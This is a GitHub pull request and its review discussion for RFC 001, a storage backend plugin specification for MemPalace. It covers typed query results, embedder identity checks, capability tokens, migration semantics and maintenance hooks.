
docs: RFC 001 — storage backend plugin specification#743

Open
igorls wants to merge 5 commits into develop from docs/rfc-storage-backend-plugin-spec

Conversation

@igorls
Member

@igorls igorls commented Apr 12, 2026

Summary

  • Drafts a formal contract for MemPalace storage backends so third parties can ship pip install mempalace-<name> packages that drop into core without patches.
  • Resolves the open design decisions deliberately deferred by the MemPalace backend seam (#413), driven by the six in-flight backend PRs each implementing the interface differently.
  • Sets the stage for MemPalace as a long-lived daemon managing many palaces, where different palaces may route to different backends.

Tracking issue: #737 (see discussion and follow-up comments for the design rationale).

Key decisions in the draft

  • Distribution: entry-point group mempalace.backends; pip install is sufficient to add a backend.
  • Return types: typed QueryResult / GetResult dataclasses replace Chroma's dict shape from day one. ChromaCollection gets a thin adapter.
  • Daemon-first model: PalaceRef(id, local_path?, namespace?) replaces palace_path: str. Backend instances are long-lived and multi-palace; thread-safe across palaces.
  • Where-clause contract: required subset $eq, $ne, $in, $nin, $and, $or, $contains; unknown operators MUST raise UnsupportedFilterError (silent drop forbidden).
  • Embedder decoupling: mandatory injection; backends persist model_name and raise EmbedderIdentityMismatchError on swap (not just dimension).
  • Capability tokens: supports_* naming, free-form strings, extensible by third parties.
  • Conformance: shared AbstractBackendContractSuite pytest mixin + optional parametrized run of the core suite across all backends under MEMPALACE_TEST_ALL_BACKENDS=1.
  • Benchmark honesty: optional maintenance_state() / run_maintenance(kind); published numbers must cover three phases (post-load, post-native-maintenance, post-explicit-maintenance).
  • Migration: backend-neutral mempalace migrate + mempalace verify operating through BaseCollection only — no per-backend migration code.
  • Sync: capability flag + separate subsystem; local deployments never load it.
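
For concreteness, the entry-point bullet boils down to roughly the following (a hedged sketch — `discover_backends` is an illustrative name, not spec API):

```python
from importlib.metadata import entry_points


def discover_backends(group: str = "mempalace.backends") -> dict:
    """Map backend name -> backend class for every installed plugin.

    Any package declaring an entry point in the mempalace.backends group
    (in its pyproject.toml) is picked up automatically after
    `pip install mempalace-<name>`; core needs no patches.
    """
    eps = entry_points()
    # Python 3.10+ exposes .select(); older versions return a dict.
    selected = eps.select(group=group) if hasattr(eps, "select") else eps.get(group, ())
    return {ep.name: ep.load() for ep in selected}
```

A plugin package would then only need an `[project.entry-points."mempalace.backends"]` table in its pyproject.toml to be discoverable.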

Impact on in-flight PRs

Each of #574, #643, #665, #697, #700, #381 is called out in §11 with the specific alignment work required — #574 is closest to the final shape, #697's collection_prefix concern dissolves into PalaceRef.namespace, #700 and #381 need the canonical UUID5 namespace.

Gating cleanup (not in this PR)

Seven files still import chromadb directly (repair.py, dedup.py, cli.py ×2, mcp_server.py, migrate.py, plus an instructions doc). Combined with the dict-to-typed-result migration, this needs its own PR landing before the spec can be enforced. Called out in §10.

Test plan

  • Backend authors (@skuznetsov @dekoza @RobertoGEMartin @cschnatz @Anush008) review for show-stoppers against their PRs
  • Agreement on the three open questions in §12 (per-collection changes_since filter, per-palace capability query, run_maintenance return shape)
  • Canonical NAMESPACE_MEMPALACE UUID assigned (§7.4)
  • Once approved, follow-up PR to land the seam cleanup + typed-result migration (§10)
  • Follow-up PR to land AbstractBackendContractSuite + entry-point discovery + PalaceRouter + PalaceRef

Formalizes the BaseCollection/BaseBackend contract introduced as a seam
in #413 into an interchangeability spec that third-party backends can
build to. Driven by six in-flight backend PRs (#574, #643, #665, #697,
#700, #381) each implementing the interface differently.

Key decisions captured: entry-point distribution, typed QueryResult/
GetResult replacing Chroma dict shape, daemon-first multi-palace model
via PalaceRef, required where-clause subset (incl. $contains),
mandatory embedder injection with model-identity validation, capability
tokens, shared pytest conformance suite, and a backend-neutral
migrate/verify CLI.
Copilot AI review requested due to automatic review settings April 12, 2026 23:27
Contributor

Copilot AI left a comment


Pull request overview

This PR introduces RFC 001, a draft specification for MemPalace storage backend plugins. It formalizes a stable contract so third-party backends can be distributed as mempalace-<name> Python packages and loaded into MemPalace via entry-point discovery, enabling multi-backend / multi-palace (daemon-first) deployments.

Changes:

  • Adds a full draft spec defining the BaseCollection / backend lifecycle contract, including typed QueryResult / GetResult shapes.
  • Specifies backend discovery/selection (entry points + registry), configuration shape, and capability-token conventions.
  • Defines required filter dialect behavior, migration/verification expectations, and a shared backend conformance test suite concept.


igorls added 2 commits April 12, 2026 20:35
Copilot review flagged back-references in §1.4 and §6 that still used
the pre-skuznetsov-rename names (`$contains_fast`, `sync_capable`,
`change_feed`). Updated to the `supports_*` prefix used in the §2.1
capability table.
Incorporates review feedback from skuznetsov (Postgres, #665) and
dekoza (Lance, #574) on issue #737:

- §1.5: split 'accepts embeddings=' (signature compliance) from
  'persists embeddings as-is' (correctness). Adds
  supports_embeddings_passthrough capability; the former is universal,
  the latter is required to label a migration lossless.
- §1.5: model identity check becomes a three-state machine
  (known_match / known_mismatch / unknown) so legacy palaces without
  recorded identity don't hard-fail on upgrade.
- §1.4: makes explicit that supports_contains_fast is the ONLY
  performance floor the spec promises; without it callers MUST assume
  O(n). $contains is a correctness requirement, not a performance one.
- §3.3: clarifies auto-detect is an upgrade-compat path only, never
  the selection mechanism for new palaces.
- §8.2: migrate CLI refuses to run against a target lacking
  supports_embeddings_passthrough unless --accept-re-embed is passed;
  migration record now captures lossless status and model identities.
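
The three-state machine in the §1.5 change above might look like this in practice (a sketch; the function name and signature are illustrative, only the state names come from the commit):

```python
from enum import Enum
from typing import Optional


class IdentityState(Enum):
    KNOWN_MATCH = "known_match"
    KNOWN_MISMATCH = "known_mismatch"
    UNKNOWN = "unknown"


def check_model_identity(recorded: Optional[str], injected: str) -> IdentityState:
    """Classify a palace's persisted embedder identity against the injected one.

    Legacy palaces that predate identity recording have recorded=None and
    land in UNKNOWN: warn rather than hard-fail, and record the identity on
    the next successful write.
    """
    if recorded is None:
        return IdentityState.UNKNOWN
    if recorded == injected:
        return IdentityState.KNOWN_MATCH
    return IdentityState.KNOWN_MISMATCH
```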

@dekoza dekoza left a comment


Reviewed from the LanceDB (#574) perspective. No show-stoppers — our implementation is already close to the spec's target shape. Notes below.

§1.1 — kwargs-only signatures

Our backends/lance.py already uses kwargs-only on add/upsert, and our BaseCollection ABC in backends/base.py does the same (work done in #575, easily backported). query/get/delete currently use **kwargs catch-all — those need explicit parameter lists to match the spec.

§1.1 — query_embeddings and where_document

Our query() doesn't accept query_embeddings and neither query() nor get() accepts where_document. Both are straightforward for LanceDB:

  • query_embeddings: skip the embed step, search the vector directly
  • where_document: same $contains path (Tantivy FTS or LIKE fallback)

§1.1 — update() method

Our BaseCollection and LanceCollection already have an update() method (fetches existing records, merges changes, re-upserts). The spec's BaseCollection does not include update(), though supports_update exists as a capability token. Is update() intentionally excluded from the required interface, or an oversight? If it stays out, we'd keep it as a LanceDB-specific extension — but it seems generally useful.

§1.3 — Typed results

Our return shapes already match QueryResult/GetResult field structure. Migration is wrapping dict construction in dataclass constructors. No concern.

§1.5 — Three-state model identity

We persist embedding_model per-record in metadata_json but not at collection level. Spec wants collection-level persistence + check on open. LanceDB supports table-level metadata via Arrow schema metadata — clean fit. The unknown state for legacy palaces is the right call; hard-failing on upgrade would break existing users.

§2.3 — BaseBackend class

We already have LanceBackend in backends/lance.py with a get_collection() factory method (from #575, easily backported to #574). It currently takes palace_path: str — adapting to PalaceRef is straightforward. It does not yet subclass a BaseBackend ABC (spec §2.3), but the method shape is close.

§3.3 — Auto-detection

Our backends/__init__.py already has detect_backend() sniffing for .lance directories. Adapting to a BaseBackend.detect(path) -> bool classmethod is trivial. Agree with the spec's framing that auto-detection is a migration compatibility path, not a selection mechanism.

§6 — Sync compatibility note

Our sync implementation uses a _raw=True flag on upsert() to skip sync metadata injection during sync apply. The spec's BaseCollection.upsert() has no such parameter, which is correct — sync concerns should not leak into the collection contract. This means we need to refactor sync injection out of LanceCollection into a wrapper layer, which aligns with §6's "sync is a separate subsystem" stance. Wanted to flag this since other backends implementing sync will face the same design question.
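
That wrapper-layer refactor could look roughly like this (a sketch under the assumption that sync stamping moves outside the collection contract; the class and metadata keys are invented for illustration):

```python
class SyncInjectingCollection:
    """Wraps a BaseCollection-shaped object and stamps sync metadata on
    upsert, keeping the collection contract itself sync-free.

    During sync apply, callers write through the inner collection directly
    instead of threading a _raw=True flag through the contract.
    """

    def __init__(self, inner, replica_id: str):
        self.inner = inner
        self.replica_id = replica_id
        self._clock = 0  # illustrative logical clock

    def upsert(self, *, ids, documents, metadatas, **kwargs):
        self._clock += 1
        stamped = [
            {**(m or {}), "_sync_replica": self.replica_id, "_sync_clock": self._clock}
            for m in metadatas
        ]
        return self.inner.upsert(
            ids=ids, documents=documents, metadatas=stamped, **kwargs
        )
```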

§10 — Cleanup gating

+1 on landing the Chroma direct-import cleanup before backend PRs rebase. The seven files importing chromadb directly would break any pure-Lance deployment. This cleanup benefits all backend authors equally.

§11 — Alignment effort for #574

Assessment is accurate. We already have backends/ with BaseCollection ABC, LanceBackend, and kwargs-only signatures (work from #575, easily backported). Remaining work: explicit param lists on query/get/delete (instead of **kwargs), typed results, $contains/where_document, collection-level model identity, PalaceRef adoption, conformance test subclass, sync injection refactor, and package extraction to mempalace-lance. All small-to-medium. No architectural conflicts.

§12 — Open questions

  1. changes_since with collection filter — yes, useful. Our sync tracks changes per-table; filtering by collection name is natural.
  2. Per-palace capabilities — worth having. supports_contains_fast depending on whether an FTS index exists is a real case for us.
  3. run_maintenance return shape — structured return preferred. LanceDB compaction can report fragment count before/after and bytes reclaimed, useful for operator dashboards and benchmark reporting.

@skuznetsov
Contributor

Reviewed the actual RFC diff. From the Postgres / pg_sorted_heap side, I do not see a blocker. The direction is compatible with #665: injected embedder, explicit capability tokens, lossless-vs-reembed migration split, and maintenance-state benchmark hooks all map cleanly.

Three small spec-clarity points I would consider before backend authors start rebasing:

  1. Goal wording vs §8.2 migration semantics

The Goals section says mempalace migrate moves palaces between backends “without data loss”. §8.2 is more precise: migration is lossless only when the source supports embedding export, the target supports embedding passthrough, and model identity is compatible. I would mirror that nuance in the Goals section so the RFC does not overpromise. Suggested framing: “supports lossless migration when source/target capabilities allow it, and explicit re-embedding otherwise.”

  2. server_embedder needs an explicit identity/dimension contract

§1.5 says backends MUST NOT hardcode models and must validate model identity/dimension, but §2.1 / §5 allow server_embedder backends to ignore the injected embedder. That can be valid, but the RFC should say what identity gets recorded and validated in that mode. For example: a server-embedder backend should expose its effective model_name and dimension, and the same dimension/model identity rules should apply to that effective embedder. Otherwise server_embedder becomes an implicit escape hatch from the safety rules.

  3. Maintenance kinds need discovery

§7.3 says benchmarks should run explicit run_maintenance if the backend advertises maintenance kinds, but I do not see where those kinds are advertised. A small hook would make the benchmark harness deterministic, e.g. maintenance_kinds: frozenset[str] or maintenance_state()["supported_kinds"]. Without that, harnesses will need backend-specific knowledge to decide whether "analyze", "compact", or "reindex" exists.

None of these change the shape of the RFC. They are mostly guardrails to keep the spec precise once implementations begin targeting it.

Collaborator

@jphein jphein left a comment


Reviewed from the perspective of a 134K-drawer production deployment on the Chroma backend, with experience evaluating LanceDB (via Karta's embedded LanceDB + SQLite architecture).

No show-stoppers. This is the right time to formalize the backend contract — the six-way divergence is already causing friction. Notes below.

§1.3 — Typed results (migration cost for existing forks/consumers)

This is a breaking change for anyone with code touching mcp_server.py or searcher.py that assumes dict returns. My fork has ~20 changes across those files — all dict-shaped. The migration path is clear (wrap in dataclass constructors, same as dekoza noted), but the blast radius is worth calling out: it's not just backend authors who need to update, it's everyone downstream who consumes query results. A compatibility shim (.to_dict() on the result types) during the transition would make the upgrade gentler for plugin authors and forks.

§1.5 — Three-state model identity is exactly right

My palace has 134K drawers with no recorded embedder identity. Hard-failing on upgrade would brick every pre-v1 palace. The unknown → warn → record-on-next-write path is the correct design. One detail: the spec says the identity is recorded "on the next successful write, reindex, or migration." For read-heavy deployments that rarely write new drawers, this means the palace could stay in unknown state indefinitely. Consider also recording on explicit mempalace verify or mempalace status (read-only operations that already touch the collection) so operators can resolve it without forcing a write.

§2.5 — Concurrency guarantee matches real usage

The spec says backends can assume single-thread access per collection, with core serializing per palace. This matches how the MCP server actually works today — good call. My fork added threading.Lock to the graph cache (#661) because build_graph() was the one place concurrent access was possible. The per-palace serialization guarantee would have made that unnecessary. Worth documenting this guarantee prominently so backend authors don't over-synchronize.

§7.3 — Benchmark methodology is the most underrated section

At 134K drawers on Chroma, I've hit the HNSW pathology firsthand — the graph's on-disk size and query latency behave very differently before and after compaction, and after external writes that invalidate the in-memory index (the exact problem my stale HNSW mtime detection fix addresses in #663). The three-phase benchmark requirement (post-bulk-load, post-background-maintenance, post-explicit-maintenance) would have caught the performance cliff I found empirically. Strong +1 on maintenance_state() being part of the published numbers.

§8 — Migration at scale

At 134K drawers, re-embedding is not a minor cost — it's hours of compute depending on the model. The lossless vs re-embed distinction and the --accept-re-embed explicit opt-in are the right design. One request: mempalace migrate should report progress (rows migrated / total, ETA) for large palaces. A 134K-drawer migration that runs silently for hours will get killed by impatient operators.

§10 — Cleanup prerequisite will affect fork contributors

My fork's mcp_server.py imports chromadb directly for the BLOB seq_id repair (#664) and mtime-based cache invalidation (#663). Both are deeply Chroma-specific. The cleanup PR routing all callers through BaseCollection is the right gating decision, but it will require Chroma-specific fixups to move behind the backend boundary. Backend-specific maintenance operations (like BLOB repair) might need a BaseBackend.repair() or similar escape hatch — otherwise they end up as out-of-band scripts that bypass the abstraction.

§12 — Open questions

  1. Per-palace capabilities — yes. supports_contains_fast depending on whether an FTS index exists is a real case. I'd add: supports_mtime_detection or similar for backends where external-write detection is possible (Chroma via SQLite mtime) vs not (server-mode backends where the filesystem isn't local). My #663 fix is Chroma-specific precisely because mtime detection only makes sense for local file-backed stores.

Addresses the actual spec defects flagged in #743 review, ignoring
operator-UX asks that are not plugin-contract concerns.

- Goal #3: 'without data loss' → mirrors §8.2's capability-conditional
  lossless-vs-reembed framing. No more overpromise.
- §1.5: `server_embedder` is no longer an implicit escape hatch from
  identity/dimension rules. Such backends MUST expose an effective
  identity via `effective_embedder_identity()` and are bound by the
  same three-state check.
- §7.3: adds `maintenance_kinds: ClassVar[frozenset[str]]` advertisement
  mechanism. `run_maintenance(kind)` must raise
  UnsupportedMaintenanceKindError for unadvertised kinds. Benchmark
  harness reads this set rather than guessing kind names. Reserves
  `analyze`/`compact`/`reindex` as well-defined names.
- §1.2: adds `update()` as optional method with a default get+merge+
  upsert implementation. §2.1: `supports_update` redefined to gate
  atomic single-round-trip semantics (not mere capability), since the
  default impl already supports partial updates.

Operator asks explicitly NOT adopted (diplomatic shims, not contract
defects): `.to_dict()` compat on typed results, migration progress
reporting, `BaseBackend.repair()` separate from `run_maintenance`,
per-palace capability variance, identity recording on read-only ops.
@igorls
Member Author

igorls commented Apr 13, 2026

Thanks @skuznetsov @dekoza @jphein — substantive reviews on all sides. Commit 922aa99 closes the four spec defects the reviews surfaced. A number of reasonable operator asks are explicitly not being adopted; explaining both below, so the boundary is clear for anyone implementing against this.

Adopted — spec defects

1. Goals wording (skuznetsov) — Goal 3 now mirrors §8.2 instead of overpromising "without data loss." The spec delivers lossless migration when capabilities allow, re-embedding otherwise. Both are explicit; neither is hidden.

2. server_embedder identity contract (skuznetsov) — a stated safety invariant with an unspecified escape hatch is a real correctness hole. Closed:

A backend advertising server_embedder (§2.1) provides its own embedder and MAY ignore the embedder= kwarg passed to get_collection. That does not exempt it from the dimension and identity rules above. Such backends MUST expose an effective model_name: str and dimension: int via BaseCollection.effective_embedder_identity(), persist that effective identity on first write, and validate it on open under the same three-state rules.

server_embedder now documents where the embedding happens; it never suspends the safety contract. A backend that can't report its effective embedder identity doesn't qualify for the capability.

3. maintenance_kinds discovery (skuznetsov) — §7.3 referenced something the spec never defined. Fixed with a class-level maintenance_kinds: ClassVar[frozenset[str]]. The spec reserves "analyze", "compact", "reindex" as well-defined names; backends may add their own. run_maintenance(kind) MUST raise UnsupportedMaintenanceKindError for unadvertised kinds. The benchmark harness reads this set rather than guessing names.
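
A minimal sketch of that advertisement mechanism (the class-level set and error name follow the comment above; the backend itself and its return shape are illustrative):

```python
from typing import ClassVar


class UnsupportedMaintenanceKindError(Exception):
    pass


class ExampleBackend:
    """Illustrative backend advertising its maintenance kinds (§7.3).

    "compact" and "analyze" are two of the spec's reserved names; a backend
    with no analogue for a kind omits it from the set rather than declaring
    a no-op.
    """

    maintenance_kinds: ClassVar[frozenset] = frozenset({"compact", "analyze"})

    def run_maintenance(self, kind: str) -> dict:
        if kind not in self.maintenance_kinds:
            raise UnsupportedMaintenanceKindError(kind)
        # ... perform the actual maintenance work here ...
        return {"kind": kind, "ok": True}
```

A benchmark harness can then iterate `backend.maintenance_kinds` instead of guessing which kind names exist.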

4. update() method / supports_update mismatch (dekoza) — a capability token that gates nothing is incoherent. update() is now an optional method in §1.2 with a default implementation (get → merge → upsert). supports_update is redefined to gate atomic, single-round-trip semantics — not the mere ability to do partial updates, which the default already provides. Backends with native primitives (Postgres UPDATE, Lance merge_insert) override and advertise; others inherit the default.
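
The default implementation described here could be sketched as a mixin (a hedged sketch — the attribute-style result access assumes the spec's typed GetResult shape; the mixin name is invented):

```python
class DefaultUpdateMixin:
    """Default non-atomic update() (§1.2): get -> merge -> upsert.

    Backends with a native single-round-trip primitive (Postgres UPDATE,
    Lance merge_insert) override this and advertise supports_update;
    everyone else inherits the read-modify-write default.
    """

    def update(self, *, ids, metadatas):
        existing = self.get(ids=ids)  # assumed GetResult-like object
        merged = [
            {**(old or {}), **(new or {})}
            for old, new in zip(existing.metadatas, metadatas)
        ]
        return self.upsert(
            ids=ids, documents=existing.documents, metadatas=merged
        )
```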

Not adopted — operator comfort, not plugin-contract concerns

These are all reasonable asks, and I want to be explicit that they're not dismissed because they're wrong — they're not adopted because they don't belong in this spec. A well-engineered plugin contract has a small, stable surface. Layering operator-UX conveniences into the core interface makes it worse for every future backend author.

  • .to_dict() compat shim on typed results (jphein) — directly contradicts §1.3's design intent of dropping the Chroma dict shape. Adding an escape hatch re-legitimizes the thing the spec removes. Fork migration pain is what minor version bumps are for; callers move to attribute access.

  • Migration progress reporting (jphein) — CLI UX concern. Belongs in the mempalace migrate implementation, not in the backend contract. A backend doesn't care whether the CLI prints a progress bar. The CLI PR will implement it; the spec says nothing about it.

  • BaseBackend.repair(kind) escape hatch (jphein) — redundant with run_maintenance(kind). "Repair" is a maintenance kind, not a separate concept. Keeping them distinct would fragment the same mechanism. Chroma's BLOB seq_id repair becomes run_maintenance("repair") or a Chroma-specific reserved kind.

  • Per-palace capability variance (dekoza, jphein) — this muddies the contract. Capabilities advertise what a backend can do. Making them palace-dependent turns every capability check into "maybe — depends." That pushes state tracking onto every caller for a small gain. A backend that builds indexes lazily either guarantees the index exists when needed (and advertises the capability) or doesn't. Static contract.

  • Identity recording on read-only ops (jphein) — complicates the state machine for an operator-UX concern. "My read-heavy palace stays unknown forever" is solved by mempalace palace set-embedder --model NAME (already in §1.5), not by making the state transition rules asymmetric.

  • supports_mtime_detection (jphein) — almost certainly redundant with sync change-feed contract once the sync subsystem is specified. Don't add capabilities speculatively.

Net

Four spec edits, small and targeted. The contract is tighter for it. The rejected items are good ideas for the implementations — CLI progress, fork-friendly shims, richer operator tooling — they just don't live in the plugin contract.

#743 is ready for another look.

@skuznetsov
Contributor

Thanks, this addresses my Postgres / pg_sorted_heap concerns. The revised goal wording, server_embedder identity contract, and maintenance_kinds discovery hook all look aligned with what #665 needs. I’m good with this RFC direction from the Postgres backend side and will review the implementation PRs when they land.

#757 landed mtime/inode cache invalidation and mempalace_reconnect
in mcp_server._get_client(). Both are Chroma-specific (stat of
chroma.sqlite3). They should migrate into ChromaBackend.get_collection
and ChromaBackend.close_palace during the §10 cleanup so the freshness
contract lives inside the backend, not in the caller.
@igorls igorls added the area/install, documentation, and storage labels Apr 14, 2026
igorls added a commit that referenced this pull request Apr 14, 2026
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct
`import chromadb` outside the ChromaDB backend itself so the core
modules depend only on the backend abstraction layer.

Extends ChromaBackend with make_client, get_or_create_collection,
delete_collection, create_collection, and backend_version. Adds
update() to the BaseCollection contract. Non-backend callers
(mcp_server, dedup, repair, migrate, cli) now go through the
abstraction; tests patch ChromaBackend instead of chromadb.

With this landed, the RFC 001 spec can be enforced and PalaceStore
(#643) can ship as a plugin without touching core modules.
@skuznetsov
Contributor

Quick coordination question from the PostgreSQL / pg_sorted_heap backend side:

Is RFC 001 now stable enough to use as the target contract for reworking #665, or would you prefer that implementation PRs wait until #743 is merged and the §10 backend cleanup follow-up starts/lands?

From my side, the expected #665 rewrite would target the RFC shape directly:

  • injected/recorded embedder identity instead of backend-owned embedding globals
  • typed QueryResult / GetResult
  • BaseBackend / BaseCollection + capability tokens
  • PalaceRef
  • maintenance hooks (maintenance_kinds, maintenance_state, run_maintenance)
  • conformance test coverage
  • conservative docs positioning for pgvector vs optional pg_sorted_heap

I’m asking to avoid rebasing the current conflicting branch into an intermediate shape if the intended path is now RFC-first.

@cschnatz

Read the full spec. From the multi-tenant hosted side (#697), this looks solid.

Works for us

  • §4.4 PalaceRef.namespace absorbs our collection_prefix cleanly. We're already building shared team palaces on top of this — personal vaults map to PalaceRef(namespace="tenant_<uuid>"), team vaults to PalaceRef(namespace="team_<uuid>"), and search fans out across both. The namespace abstraction is exactly what we need.
  • §2.5 Concurrency model matches our sidecar design.
  • §3.1 Entry points mean we can ship our ChromaHttpBackend as a proper plugin instead of vendoring.

Questions

1. Namespace isolation — security boundary or naming convention?

For us, namespace is a tenant isolation boundary. When a user searches across personal + team vaults, the sidecar resolves which namespaces to query based on a gateway-authorized team_ids list. A team namespace that isn't in that list gets rejected. §4.4 says "the backend uses it as given" — should backends also enforce namespace isolation, or is that purely the caller's job?

2. PalaceRef.id uniqueness scope

Unique globally or per backend instance?

3. Typed results (§1.3) — hard cutover?

Is there a transition period, or do all callers need to migrate from Chroma dicts in one go? We have 30 MCP tool functions consuming dict shapes.

4. §7.4 NAMESPACE_MEMPALACE

Worth assigning now — the placeholder blocks Qdrant PRs.

5. §10 mcp_server caching

We hit a related bug (collection cache bleed between tenants). Moving caching into ChromaBackend.get_collection() would fix this structurally.

#697 alignment

Our collection_prefix dissolves into PalaceRef.namespace as described in §11. Ready to rebase once spec + cleanup PR land. Happy to be an early conformance suite adopter.

igorls added a commit that referenced this pull request Apr 18, 2026
…nd registry (RFC 001 §10)

Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres,
#700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target
to align against.

Scope (this PR):

- Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at
  the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps
  existing callers working while the attribute-access migration proceeds.
- BaseCollection is now kwargs-only across add/upsert/query/get/delete/update
  with ABC defaults for estimated_count/close/health and a non-atomic default
  update() (§1.1–1.2).
- PalaceRef replaces raw path strings at the backend boundary (§2.2).
- BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3).
- mempalace.backends entry-point group + in-tree registry with
  resolve_backend_for_palace priority order matching §3.2–3.3.
- ChromaCollection normalizes chroma returns into typed results; unknown
  where-clause operators raise UnsupportedFilterError (no silent drop, §1.4).
- ChromaBackend absorbs the inode/mtime client-cache freshness check
  previously duplicated in mcp_server._get_client() (§10 + PR #757).
- searcher.py migrated to typed-attribute access as the reference call
  site; remaining callers land in a follow-up.
- pyproject: chroma registered via [project.entry-points."mempalace.backends"].

Out of scope (explicit follow-ups):

- Full caller migration off the dict-compat shim across palace.py,
  mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py,
  palace_graph.py, cli.py, closet_llm.py.
- Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5).
- maintenance_state() / run_maintenance() benchmark hooks (§7.3).
- AbstractBackendContractSuite full coverage (§7.1–7.2).
- mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8).

Tests: 970 passed (up from 967 on develop); new coverage for typed results,
  empty-result outer-shape preservation, $regex rejection, registry lookup,
priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection.

Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
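
The no-silent-drop rule this commit enforces (§1.4) amounts to a recursive operator check; a minimal sketch (`validate_where` and `REQUIRED_OPS` are illustrative names, not spec API):

```python
REQUIRED_OPS = {"$eq", "$ne", "$in", "$nin", "$and", "$or", "$contains"}


class UnsupportedFilterError(Exception):
    pass


def validate_where(where: dict) -> None:
    """Recursively reject any operator outside the required subset (§1.4).

    Silently dropping unknown operators is forbidden: $regex, for example,
    must raise rather than be ignored.
    """
    for key, value in where.items():
        if key.startswith("$"):
            if key not in REQUIRED_OPS:
                raise UnsupportedFilterError(key)
            if key in ("$and", "$or"):
                for clause in value:
                    validate_where(clause)
        elif isinstance(value, dict):
            validate_where(value)
```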
jphein added a commit to jphein/mempalace that referenced this pull request Apr 19, 2026
Scanned all 233 open upstream PRs today against our open PRs and
fork-ahead / planned-work items. Findings merged into README:

- P2 (decay) and P3 Tier-0 (LLM rerank): both covered by MemPalace#1032
  (@zackchiutw, MERGEABLE, 2026-04-19 — Weibull decay + 4-stage
  rerank pipeline). Older simpler version at MemPalace#337. Dropped as
  fork work; watching MemPalace#1032.
- P7 (alternative storage): formally out of scope. RFC 001 MemPalace#743
  (@igorls) defines the plugin contract; four backend PRs already
  in flight (MemPalace#700, MemPalace#381 Qdrant; MemPalace#574, MemPalace#575 LanceDB). Fork consumes,
  does not rebuild.
- P0 (multi-label tags): still fork/upstream candidate. MemPalace#1033
  (@zackchiutw) ships adjacent privacy-tag + progressive disclosure
  but not the full multi-label scheme.
- Merged MemPalace#1023 section acknowledges complementary MemPalace#976 (felipetruman)
  which adds broader mine_global_lock() + HNSW num_threads pin.

Gives future-us a map so we don't re-file MemPalace#1036-style duplicates.
Collaborator

@bensig bensig left a comment


Reviewed in full. This is the right shape and depth for a 1.0 spec — closes the open decisions deliberately deferred by #413, calls out the in-flight PR impact concretely, names the cleanup work it depends on, and stays out of scope where deferral is honest (sync, wire protocol, embedder).

Approving on merit. One mechanical block + a few suggestions worth folding in before this lands.

Block

  • §7.4 `NAMESPACE_MEMPALACE = uuid.UUID("TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME")` — placeholder. Needs an actual UUID assigned and recorded in the spec text before this merges, since the section explicitly says "fixed at spec v1 adoption." Suggest `python -c "import uuid; print(uuid.uuid4())"` and pin it.

Suggestions (small, fold-in-able)

  1. §5 references "a separate RFC" for the embedder contract. Worth either filing the tracking issue and linking it from this section, or marking the dependency as a parallel work item in §13. Right now the spec hard-depends on an external contract that has no anchor.

  2. §4.2 env var splitting rule for hyphenated/underscored backend names. The example uses backend name "pg_prod" in §4.1 but `MEMPALACE_POSTGRES_DSN` in §4.2. If users name a backend "pg_prod", does the env shape become `MEMPALACE_PG_PROD_`? `MEMPALACE_PG-PROD_`? Or is `MEMPALACE__` keyed by backend type not instance? One sentence would close it.

  3. §3.3 priority + global env interaction. A user with `MEMPALACE_BACKEND=postgres` set globally who opens a palace with on-disk Chroma artifacts gets postgres (env wins, auto-detect skipped). That's correct behavior, but worth one sentence calling it out — "setting MEMPALACE_BACKEND globally overrides existing-palace auto-detection; users opening pre-existing palaces should leave it unset." Saves a real support incident.

  4. §9 major-version mismatch error. "Refuses to load a backend declaring a different major version." Worth a one-line example of the error message shape so backend authors know what their users will see when they install an incompatible version. Drop a `BackendVersionMismatchError(...)` example next to the rule.

  5. §7.4 reserved maintenance kinds. `"analyze"` / `"compact"` / `"reindex"` are reserved with required semantics. Consider naming the non-required implementation pattern: e.g., "a backend that has no analogue for a kind MUST omit it from `maintenance_kinds` rather than declaring it as a no-op." Otherwise nothing prevents a benchmark harness from seeing `"analyze"` in `maintenance_kinds` and assuming it does what the spec says when the implementation is empty.
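To make suggestion 4 concrete, the error shape could look something like this — class name, fields, and message wording are my proposal, not spec text:

```python
class BackendVersionMismatchError(RuntimeError):
    """Raised when a discovered backend declares an incompatible spec major version."""

    def __init__(self, backend: str, declared: str, supported: str):
        super().__init__(
            f"backend '{backend}' declares spec major version {declared}, "
            f"but this MemPalace build supports major version {supported}; "
            f"upgrade mempalace or install a compatible release of the backend"
        )
        self.backend = backend
        self.declared = declared
        self.supported = supported
```

One sentence plus an example like this tells backend authors exactly what their users will see after a bad `pip install`.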

Strengths

  • Capability-token design is sharp. The signature-compliance vs semantic-guarantee split (`supports_embeddings_in` vs `supports_embeddings_passthrough`) is exactly the right granularity. Same for the `server_embedder` carve-out in §1.5 — `server_embedder` documents where embedding happens, never suspends the dimension/identity safety contract. Beautifully written paragraph; reads like it survived a real ambiguity.
  • Three-state embedder identity check (`known_match` / `known_mismatch` / `unknown`) is the kind of detail that prevents a real upgrade incident. Hard-failing legacy palaces from #413 would be hostile; this gives them a clean transition path with a warning.
  • §10 cleanup prerequisite is honest. Names the 7 files still importing `chromadb` directly with line numbers, calls out `mcp_server._get_client()` as a Chroma-specific cache that needs to migrate into `ChromaBackend.get_collection()` per §2.5. Most RFCs hand-wave this section; this one names the actual work.
  • Migration honesty (§8.2). Lossless vs re-embed is explicit; `--accept-re-embed` is required, written to the migration log, never silent. The pairing requirement (`supports_migration_export` source-side + `supports_embeddings_passthrough` target-side) prevents a class of subtle silent-degrade bugs.
  • Benchmark methodology in §7.3 is rare to see in an RFC and prevents the un-`ANALYZE`'d-Postgres-vs-settled-Chroma anti-pattern. Reserved kind names + three-phase publishing requirement + harness MUST NOT assume kind names — that's the level of rigor this saves you from re-litigating later.
  • §3.3 auto-detection scoped tightly. "Strictly a migration/upgrade compatibility path, not a general selection mechanism." Explicit configuration always wins. Right call.
  • §11 in-flight PR impact table is concrete. Shows this spec was written with the actual outstanding work in mind, not in a vacuum. Each PR has a one-line align-effort estimate.
